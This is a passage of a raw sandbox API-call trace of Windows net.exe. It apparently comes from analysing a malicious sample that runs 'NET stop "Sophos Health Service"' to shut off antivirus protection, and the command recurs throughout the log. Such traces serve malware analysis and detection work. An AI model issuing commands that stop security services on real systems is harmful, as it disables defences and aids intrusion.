_wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0043.343] wcscpy_s (in: _Destination=0xfba4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0043.343] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ee0000 [0043.343] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ee0000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0xfbb338, nSize=0x800, Arguments=0xfb9dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0043.344] GetFileType (hFile=0x26c) returned 0x3 [0043.344] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x433c18 [0043.344] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x433c18, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0043.344] WriteFile (in: hFile=0x26c, lpBuffer=0x433c18*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2bf2ec, lpOverlapped=0x0 | out: lpBuffer=0x433c18*, lpNumberOfBytesWritten=0x2bf2ec*=0x20, lpOverlapped=0x0) returned 1 [0043.344] LocalFree (hMem=0x433c18) returned 0x0 [0043.344] GetFileType (hFile=0x26c) returned 0x3 [0043.344] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x433920 [0043.344] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x433920, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nC", lpUsedDefaultChar=0x0) returned 2 [0043.344] WriteFile (in: hFile=0x26c, lpBuffer=0x433920*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bf2ec, lpOverlapped=0x0 | out: lpBuffer=0x433920*, lpNumberOfBytesWritten=0x2bf2ec*=0x2, lpOverlapped=0x0) returned 1 [0043.344] LocalFree (hMem=0x433920) returned 0x0 [0043.344] wcscpy_s (in: _Destination=0x2bf3a4, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0043.345] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0043.345] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0043.345] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0043.345] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Sophos", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos") returned 0x0 [0043.345] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos ") returned 0x0 [0043.345] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos ", _SizeInWords=0x200, _Source="Health", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Health") returned 0x0 [0043.345] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Health", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Health ") returned 0x0 [0043.345] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Health ", _SizeInWords=0x200, _Source="ServiceΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Health ServiceΓÇ¥") returned 0x0 [0043.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C댸û+Ѱûɬ") returned 0xad [0043.345] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes", _MaxCount=0x24) returned 18 [0043.345] LocalFree (hMem=0x435638) returned 0x0 [0043.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x2e [0043.345] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/ADD |", _MaxCount=0x24) returned 16 [0043.345] LocalFree (hMem=0x435638) returned 0x0 [0043.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x7d [0043.345] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:", _MaxCount=0x24) returned 16 [0043.345] LocalFree (hMem=0x435638) returned 0x0 [0043.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x26 [0043.345] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n", _MaxCount=0x24) returned 16 [0043.345] LocalFree (hMem=0x435638) returned 0x0 [0043.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x19 [0043.345] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x24) returned 16 [0043.345] LocalFree (hMem=0x435638) returned 0x0 [0043.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x1b [0043.346] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x24) returned 13 [0043.346] LocalFree (hMem=0x435638) returned 0x0 [0043.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xbe [0043.346] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:\"tex", _MaxCount=0x24) returned 12 [0043.346] LocalFree (hMem=0x435638) returned 0x0 [0043.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x33 [0043.346] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET co", _MaxCount=0x24) returned 11 [0043.346] LocalFree (hMem=0x435638) returned 0x0 [0043.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x19 [0043.346] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x24) returned 11 [0043.346] LocalFree (hMem=0x435638) returned 0x0 [0043.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xc1 [0043.346] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT", _MaxCount=0x24) returned 7 [0043.346] LocalFree (hMem=0x435638) returned 0x0 [0043.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x16 [0043.346] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x24) returned 3 [0043.346] LocalFree (hMem=0x435638) returned 0x0 [0043.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x33 [0043.346] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/DELE", _MaxCount=0x24) returned 15 [0043.346] LocalFree (hMem=0x435638) returned 0x0 [0043.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x234 [0043.347] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET SHARE\r\nsharename\r\n shar", _MaxCount=0x24) returned 12 [0043.347] LocalFree (hMem=0x435638) returned 0x0 [0043.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x13 [0043.347] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x24) returned 14 [0043.347] LocalFree (hMem=0x435638) returned 0x0 [0043.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x14 [0043.347] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x24) returned 14 [0043.347] LocalFree (hMem=0x435638) returned 0x0 [0043.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x14 [0043.347] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x24) returned 14 [0043.347] LocalFree (hMem=0x435638) returned 0x0 [0043.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x15 [0043.347] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x24) returned 14 [0043.347] LocalFree (hMem=0x435638) returned 0x0 [0043.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x15 [0043.347] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x24) returned 14 [0043.347] LocalFree (hMem=0x435638) returned 0x0 [0043.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x16 [0043.347] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x24) returned 14 [0043.347] LocalFree (hMem=0x435638) returned 0x0 [0043.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x11 [0043.347] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x24) returned 14 [0043.347] LocalFree (hMem=0x435638) returned 0x0 [0043.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x14 [0043.348] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x24) returned 14 [0043.348] LocalFree (hMem=0x435638) returned 0x0 [0043.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x12 [0043.348] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x24) returned 14 [0043.348] LocalFree (hMem=0x435638) returned 0x0 [0043.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xf [0043.348] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x24) returned 14 [0043.348] LocalFree (hMem=0x435638) returned 0x0 [0043.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x17 [0043.348] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x24) returned 14 [0043.348] LocalFree (hMem=0x435638) returned 0x0 [0043.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x18 [0043.348] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x24) returned 14 [0043.348] LocalFree (hMem=0x435638) returned 0x0 [0043.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x2a [0043.348] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | SERVE", _MaxCount=0x24) returned 14 [0043.348] LocalFree (hMem=0x435638) returned 0x0 [0043.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x15 [0043.348] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x24) returned 19 [0043.348] LocalFree (hMem=0x435638) returned 0x0 [0043.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x58 [0043.348] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAI", _MaxCount=0x24) returned -1 [0043.348] LocalFree (hMem=0x435638) returned 0x0 [0043.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x184 [0043.348] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\compute", _MaxCount=0x24) returned -2 [0043.348] LocalFree (hMem=0x435638) returned 0x0 [0043.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xc7 [0043.348] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET USER\r\n[username [password | *] [", _MaxCount=0x24) returned -2 [0043.348] LocalFree (hMem=0x435638) returned 0x0 [0043.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x47 [0043.348] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACHE] |", _MaxCount=0x24) returned -3 [0043.348] LocalFree (hMem=0x435638) returned 0x0 [0043.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xc2 [0043.349] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CON", _MaxCount=0x24) returned 19 [0043.349] LocalFree (hMem=0x435638) returned 0x0 [0043.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x319 [0043.349] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="SERVICES\r\nNET START can be used to s", _MaxCount=0x24) returned -5 [0043.349] LocalFree (hMem=0x435638) returned 0x0 [0043.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x483 [0043.349] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="SYNTAX\r\nThe following conventions ar", _MaxCount=0x24) returned -5 [0043.349] LocalFree (hMem=0x435638) returned 0x0 [0043.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xa86 [0043.349] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="NAMES\r\nThe following types of names ", _MaxCount=0x24) returned 4 [0043.349] LocalFree (hMem=0x435638) returned 0x0 [0043.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x54 [0043.349] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health ServiceΓÇ¥", _String2="\r\nFor more information on tools see ", _MaxCount=0x24) returned 97 [0043.349] LocalFree (hMem=0x435638) returned 0x0 [0043.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xad [0043.349] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET ACCOUNTS\r\n[/FORCELOGO", _MaxCount=0x19) returned 18 [0043.349] LocalFree (hMem=0x435638) returned 0x0 [0043.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x2e [0043.349] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET COMPUTER\r\n\\\\computern", _MaxCount=0x19) returned 16 [0043.349] LocalFree (hMem=0x435638) returned 0x0 [0043.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x7d [0043.349] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET CONFIG SERVER\r\n[/AUTO", _MaxCount=0x19) returned 16 [0043.349] LocalFree (hMem=0x435638) returned 0x0 [0043.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x26 [0043.349] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET CONFIG\r\n[SERVER | WOR", _MaxCount=0x19) returned 16 [0043.349] LocalFree (hMem=0x435638) returned 0x0 [0043.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x19 [0043.350] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x19) returned 16 [0043.350] LocalFree (hMem=0x435638) returned 0x0 [0043.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x1b [0043.350] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET FILE\r\n[id [/CLOSE]]\r\n", _MaxCount=0x19) returned 13 [0043.350] LocalFree (hMem=0x435638) returned 0x0 [0043.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xbe [0043.350] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET GROUP\r\n[groupname [/C", _MaxCount=0x19) returned 12 [0043.350] LocalFree (hMem=0x435638) returned 0x0 [0043.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x33 [0043.350] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET HELP\r\ncommand\r\n -", _MaxCount=0x19) returned 11 [0043.350] LocalFree (hMem=0x435638) returned 0x0 [0043.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x19 [0043.350] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x19) returned 11 [0043.350] LocalFree (hMem=0x435638) returned 0x0 [0043.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xc1 [0043.350] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET LOCALGROUP\r\n[groupnam", _MaxCount=0x19) returned 7 [0043.350] LocalFree (hMem=0x435638) returned 0x0 [0043.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x16 [0043.350] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x19) returned 3 [0043.350] LocalFree (hMem=0x435638) returned 0x0 [0043.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x33 [0043.350] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET SESSION\r\n[\\\\computern", _MaxCount=0x19) returned 15 [0043.350] LocalFree (hMem=0x435638) returned 0x0 [0043.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x234 [0043.350] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x19) returned 12 [0043.350] LocalFree (hMem=0x435638) returned 0x0 [0043.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x13 [0043.350] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET START BROWSER\r\n", _MaxCount=0x19) returned 14 [0043.350] LocalFree (hMem=0x435638) returned 0x0 [0043.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x14 [0043.350] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x19) returned 14 [0043.350] LocalFree (hMem=0x435638) returned 0x0 [0043.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x14 [0043.350] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET START EVENTLOG\r\n", _MaxCount=0x19) returned 14 [0043.350] LocalFree (hMem=0x435638) returned 0x0 [0043.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, 